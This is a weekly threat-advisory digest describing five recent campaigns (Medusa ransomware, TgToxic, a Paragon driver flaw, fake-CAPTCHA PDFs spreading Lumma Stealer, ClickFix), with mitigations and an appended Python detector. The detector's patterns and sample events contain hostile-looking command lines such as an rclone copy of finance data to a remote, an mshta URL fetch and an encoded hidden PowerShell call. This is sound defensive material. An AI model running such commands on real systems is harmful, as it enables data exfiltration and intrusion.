Medusa Ransomware Claims 40+ Victims in 2025, Demands Ransoms Up to $15Mn


In the past week, critical cybersecurity threats have emerged, with significant vulnerabilities being reported across various platforms. Recent cybersecurity incidents include the Medusa ransomware surge, which has impacted 400 victims, including 40 in early 2025, through double extortion tactics and the exploitation of Microsoft Exchange Server vulnerabilities. Additionally, researchers uncovered TgToxic, an Android banking trojan that has expanded across Asia and Europe, adopting anti-detection features like emulator detection, domain generation algorithms (DGA), and community forum-based command-and-control (C2) methods. Meanwhile, Microsoft disclosed five critical vulnerabilities in the Paragon Partition Manager BioNTdrv.sys driver, with CVE-2025-0289 actively exploited in Bring Your Own Vulnerable Driver (BYOVD) attacks to bypass Windows security and deploy ransomware. Researchers also discovered a phishing campaign using fake CAPTCHA PDFs hosted on Webflow’s CDN, distributing Lumma Stealer malware to 1,150 organizations through SEO poisoning and malicious downloads. Lastly, a ClickFix phishing campaign is using fake OneDrive error messages to trick users into executing PowerShell scripts, injecting the Havok post-exploitation framework for remote access and lateral movement. These developments underscore the urgent need for organizations to stay vigilant and apply security updates promptly.

SISA Weekly Threat Watch – our weekly feature brings to you a quick snapshot of all the major security vulnerabilities that posed a threat to organizations worldwide. These recurring actionable threat advisories will also provide information and recommendations that will help security teams take appropriate actions to defend against the latest and critical threats.


1. Medusa Ransomware Claims 40+ Victims in 2025, Demands Ransoms Up to $15Mn

Medusa ransomware has increased its attacks by 42% from 2023 to 2024, targeting nearly 400 victims overall, with 40 new victims in early 2025 alone. The group employs double extortion tactics, exfiltrating data before encrypting systems and demanding ransoms between $100,000 and $15 million. They exploit known vulnerabilities, particularly in Microsoft Exchange Server, and often rely on initial access brokers to breach networks. Once inside, they use remote management tools such as SimpleHelp, AnyDesk, and MeshAgent for persistence. They also employ Bring Your Own Vulnerable Driver (BYOVD) techniques to bypass security defenses and use PDQ Deploy for lateral movement, while RoboCopy and Rclone facilitate data exfiltration.

To mitigate these threats, organizations should patch public-facing vulnerabilities, restrict unauthorized RMM tools, and implement endpoint protection to detect BYOVD attacks. Monitoring for unusual use of PDQ Deploy, Rclone, and RoboCopy is crucial. Enforcing MFA, strengthening access controls, conducting regular threat-hunting, and maintaining offline backups can further reduce risks.

2. Banking Trojan Threat Grows: TgToxic Adopts Advanced Anti-Detection Features

TgToxic (aka ToxicPanda) is a rapidly evolving Android banking trojan targeting users in Asia and Europe. Since its discovery in 2023, it has expanded from Taiwan, Thailand, and Indonesia to Italy, Portugal, Hong Kong, Spain, and Peru. The malware is distributed via dropper APKs, likely through phishing or SMS campaigns, and continuously enhances its stealth and persistence capabilities.

Recent upgrades include improved emulator detection, a shift to using community forums for command-and-control (C2) communication, and the adoption of a domain generation algorithm (DGA) to evade takedowns. The malware can steal credentials, hijack user interfaces, and execute fraudulent transactions while remaining undetected.

To protect against TgToxic, individuals should avoid installing APKs from untrusted sources, enable Google Play Protect, use MFA, and monitor financial accounts. Organizations should implement mobile threat detection (MTD), enforce app restrictions via MDM, monitor for suspicious traffic, track DGA-generated domains, and conduct regular security awareness training.

3. BYOVD Attacks Exploit Paragon Partition Manager to Bypass Windows Security

Microsoft has identified five critical vulnerabilities in the Paragon Partition Manager BioNTdrv.sys driver, with CVE-2025-0289 actively exploited in zero-day BYOVD (Bring Your Own Vulnerable Driver) attacks. These flaws allow attackers to gain SYSTEM privileges, execute arbitrary code, and cause denial-of-service (DoS) attacks. Even systems without Paragon Partition Manager installed are at risk, as the BYOVD technique enables attackers to load the vulnerable driver independently.

Threat actors drop and load the vulnerable driver, abusing its valid Microsoft signature to bypass security controls and deploy ransomware. The resulting kernel-level access allows privilege escalation, bypassing of security products, and system crashes.

To mitigate risks, update Paragon Partition Manager, enable Windows Vulnerable Driver Blocklist, restrict unauthorized driver installations, and implement Endpoint Detection & Response (EDR) solutions. Monitoring security logs, blocking malicious driver hashes, and applying Zero Trust policies can further prevent exploitation. Microsoft has patched these flaws, reinforcing security against BYOVD threats.

4. Phishing Campaign Uses Fake CAPTCHAs in PDFs to Distribute Malware

Cybersecurity researchers have uncovered a large-scale phishing campaign using fake CAPTCHA images in PDFs hosted on Webflow’s CDN to distribute Lumma Stealer malware. Attackers leverage SEO techniques to lure victims—primarily in North America, Asia, and Southern Europe—to malicious sites that execute PowerShell commands. Over 1,150 organizations and 7,000 individuals have been affected, particularly in the technology, financial, and manufacturing sectors.

The campaign involves malicious PDFs uploaded to sites like PDFCOFFEE and Internet Archive to maximize reach. Once opened, the PDFs steal credentials or execute MSHTA commands to install Lumma Stealer, a malware-as-a-service (MaaS) tool used for data theft. Additionally, attackers distribute it via fake Roblox games and cracked software. Stolen data is later shared for free on hacking forums.

To mitigate risks, avoid downloading PDFs from untrusted sources, verify CAPTCHA prompts before interacting, restrict PowerShell execution, and implement endpoint protection. Regular phishing awareness training, monitoring for stolen credentials, and enhancing browser security can further reduce exposure.

5. ClickFix Phishing Campaign Deploys Havok Framework via Fake OneDrive Errors

A new ClickFix phishing campaign tricks victims into executing malicious PowerShell commands, deploying the Havok post-exploitation framework for remote access. Attackers disguise malware as a OneDrive error fix, leveraging Microsoft SharePoint and Graph API to evade detection. The campaign enables adversaries to maintain persistence and move laterally across corporate networks.

Victims receive phishing emails containing a malicious HTML attachment that mimics a 0x8004de86 OneDrive error message. Clicking the “How to Fix” button copies a PowerShell command, tricking users into executing it manually. If run, the script modifies the Windows Registry, installs Python, and injects the Havok framework as a DLL, granting attackers persistent access.

To mitigate risks, organizations should block untrusted PowerShell execution, train employees to identify phishing tactics, and monitor Microsoft Graph API traffic. Restrict unauthorized software installations, disable macros, use behavioral analytics for anomaly detection, and implement advanced email filtering to prevent similar attacks.
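As an added example (not code from the SISA advisory), the following Python detector applies the monitoring advice from items 1, 4 and 5 above to constructed process-creation events: it flags Rclone, RoboCopy and PDQ Deploy executions, script hosts spawned by a PDF reader or browser, and PowerShell run with hidden or encoded flags. The image-name and parent lists are assumptions to be tuned per environment.

```python
"""Added example: a small detector over constructed process-creation events,
covering tooling the advisory says to watch for: Rclone / RoboCopy / PDQ Deploy
(Medusa), and PowerShell or mshta launched from a PDF reader or browser or with
hidden/encoded flags (fake-CAPTCHA PDFs, ClickFix). Field names mimic Sysmon
Event ID 1; the events below are hand-built sample data, not real telemetry."""
import re

# Image names from the advisory, lower-case for matching (assumed file names).
EXFIL_TOOLS = {"rclone.exe", "robocopy.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "mshta.exe"}
# Parents that should not normally spawn a script host (assumed list; extend per site).
DOC_AND_BROWSER_PARENTS = {"acrord32.exe", "foxitreader.exe", "chrome.exe", "msedge.exe", "firefox.exe"}
# Flags typical of a pasted, ClickFix-style PowerShell one-liner.
SUSPICIOUS_PS = re.compile(
    r"-(e|ec|enc|encodedcommand)\b|-w(indowstyle)?\s+hidden|\biex\b|\birm\b|downloadstring", re.I)

def _base(path):
    """Return the lower-cased file name from a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()

def detect(events):
    """Return (rule_name, EventId) pairs for every event that matches a rule."""
    findings = []
    for ev in events:
        image, parent, cmd = _base(ev["Image"]), _base(ev["ParentImage"]), ev["CommandLine"]
        if image in EXFIL_TOOLS or image.startswith("pdqdeploy"):
            findings.append(("exfil-or-deploy-tool", ev["EventId"]))
        if image in SCRIPT_HOSTS and parent in DOC_AND_BROWSER_PARENTS:
            findings.append(("script-host-from-user-app", ev["EventId"]))
        if image in {"powershell.exe", "pwsh.exe"} and SUSPICIOUS_PS.search(cmd):
            findings.append(("suspicious-powershell-flags", ev["EventId"]))
    return findings

SAMPLE_EVENTS = [  # constructed sample data, not real telemetry
    {"EventId": 1, "Image": r"C:\Tools\rclone.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"rclone.exe copy D:\Finance remote:drop --transfers 8"},
    {"EventId": 2, "Image": r"C:\Windows\System32\Robocopy.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"robocopy D:\HR \\10.0.0.5\share /E"},
    {"EventId": 3, "Image": r"C:\Windows\System32\mshta.exe", "ParentImage": r"C:\Program Files\Adobe\AcroRd32.exe",
     "CommandLine": "mshta https://example.invalid/captcha"},
    {"EventId": 4, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe", "CommandLine": "powershell -w hidden -enc AAAA"},
    {"EventId": 5, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe", "CommandLine": "powershell Get-Service"},
]

if __name__ == "__main__":
    for rule, event_id in detect(SAMPLE_EVENTS):
        print(f"event {event_id}: {rule}")
```

Event 5 (an ordinary PowerShell command from cmd.exe) matches nothing, which is the baseline these rules are meant to leave alone.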

To get daily updates on the critical vulnerabilities being exploited by threat actors, subscribe to SISA Daily Threat Watch – our daily actionable threat advisories.

For a deeper understanding of how you can prevent these threats from affecting your organization, request a call to get in touch with our experts.
